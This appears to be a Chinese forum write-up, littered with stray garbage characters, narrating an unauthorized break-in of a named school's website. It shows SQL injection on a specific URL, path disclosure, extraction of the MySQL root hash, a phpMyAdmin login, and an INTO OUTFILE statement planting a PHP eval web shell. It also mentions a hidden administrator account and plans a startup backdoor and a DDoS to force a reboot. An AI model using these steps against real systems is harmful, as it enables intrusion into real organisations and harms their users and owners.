友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
1 ~4 w) }; E- l# ^3 V& c/ R6 t发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！
0 o3 P  S+ R# t3 A1 h


常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限
: n& @* ]+ f+ A5 q2 q
那么想可以直接写入shell ，getshell有几个条件：

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF
  \. G6 [" }  F5 i. l
试着爆绝对路径：
1./phpMyAdmin/index.php?lang[]=1  
2./phpMyAdmin/phpinfo.php  
3./load_file()  
+ g5 t+ Q) \( X: T4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5./phpmyadmin/libraries/select_lang.lib.php  
1 D! m! X( j  L; H# H2 ]6./phpmyadmin/libraries/lect_lang.lib.php  
( T1 f( A: X+ X# _3 _! a0 b7./phpmyadmin/libraries/mcrypt.lib.php   
0 [. u1 V, O5 q$ H8 ^; k8./phpmyadmin/libraries/export/xls.php  

1 t2 E) Q0 M6 n1 o) M9 U2 n7 ~均不行...........................

3 ?( y9 I1 Y8 l- U2 \$ Z7 `御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

( d2 v  U" {. B* {, T- V. @/ R权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin
$ q  U3 y3 s0 x
默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败
# T/ U) \% e: O$ h1 q8 j
# b: C- Q' w  W, n0 |9 e敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
$ Z$ H/ z9 l, K  U2 I' E! K
% O. L) p+ y4 r) ^; r想想root还可以读，读到root密码进phpmyadmin 也可以拿shell
) {) l2 F+ T8 k$ a( a3 F
# {5 l! H0 W% J5 v3 D0 h9 g1 R2 zhttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
6 |) l; V/ ^( D, [% n5 d
) a# e3 q; B+ B; i& R0 o! T8 I; [% }自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD
. Z8 N+ t  G) x7 k2 f0 c
8 Y3 P8 E  _4 X0 G成功读到root密码：
5 O3 \+ X# f/ r* ^
- |7 |0 q. U1 H/ Q7 d" g$ `17---- r(0072)
18---- o(006f)
4 \8 R0 G8 w. P7 V0 M19---- o(006f)
+ X$ T4 t* x/ G7 r& ^20---- t(0074)
21---- *(002a)
3 R( t: X; c( R1 T22---- 8(0038)
# t2 d( b6 l6 a$ K# |2 g/ _23---- 2(0032)
24---- E(0045)
+ \2 w" n4 p/ F. o25---- 1(0031)
26---- C(0043)
27---- 5(0035)
28---- 8(0038)
29---- 2(0032)
9 N% L' U/ R8 w! |1 C0 J' h30---- 8(0038)
3 b7 j% ]- v7 H( }1 E8 `' _. h, s31---- A(0041)
32---- 9(0039)
! y. y  ]1 _# j  n33---- B(0042)
, x6 v$ o8 B! Y2 K34---- 5(0035)
35---- 4(0034)
. v0 W7 D% Y5 ^+ C* N2 P36---- 8(0038)
& u, c4 m9 ~' Y) ?' B37---- 6(0036)
38---- 4(0034)
39---- 9(0039)
+ k* u1 w$ j5 }! [40---- 1(0031)
41---- 1(0031)
42---- 5(0035)
43---- 3(0033)
44---- 5(0035)
45---- 9(0039)
46---- 8(0038)
47---- F(0046)
9 M$ N) t5 I- Y( F3 `, Q  i1 r+ T48---- F(0046)
+ e: T- \6 h- ]49---- 4(0034)
50---- F(0046)
51---- 0(0030)
52---- 3(0033)
1 S: |2 e  z$ F& h/ B& o53---- 2(0032)
54---- A(0041)
55---- 4(0034)
' B' f: X& P- x$ P56---- A(0041)
: X7 |: w% u7 @0 U8 U# a57---- B(0042)
% F$ U1 M2 v! R  F5 L58---- *(0044)
. Y% |/ b) ~/ q( b1 C59---- *(0035)
' T* [9 u2 l/ J+ b+ b& A3 k& c60---- *(0041)
61---- *0032)
( X! I0 J3 @6 v, M( j
解密后成功登陆phpmyamin
                          

                             

找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'

& S# y3 l: f# Q2 w  x成功执行，拿下shell，菜刀连接：
) [  R6 G) L1 i) q5 E
服务器不支持asp,aspx,php提权无果...................
* C8 k3 h% w3 `
但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：
7 R4 R4 V$ ?7 e; d. w* h5 l

服务器上已经有个隐藏帐号了

( p/ P7 t' M' t0 _0 a6 t+ f7 k' @6 n. W

别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权

成员

-------------------------------------------------------------------------------
admin
) A6 ]0 |3 P2 fAdministrator
0 a/ Z2 s. q7 a: p) Lslipper$
* p' ]; Q5 ]! @1 D" v+ u) ?, Csqluser
6 ~2 [! C7 o+ @& f/ o命令成功完成。
$ S8 T  d1 Z0 F& ]( d
% A9 [4 |& q- `' W8 t服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。
6 `8 T9 a3 Z9 p# Q! i
' D8 e; [& O  vddos服务器重启，不然就只能坐等服务器重启了...............................

      

angel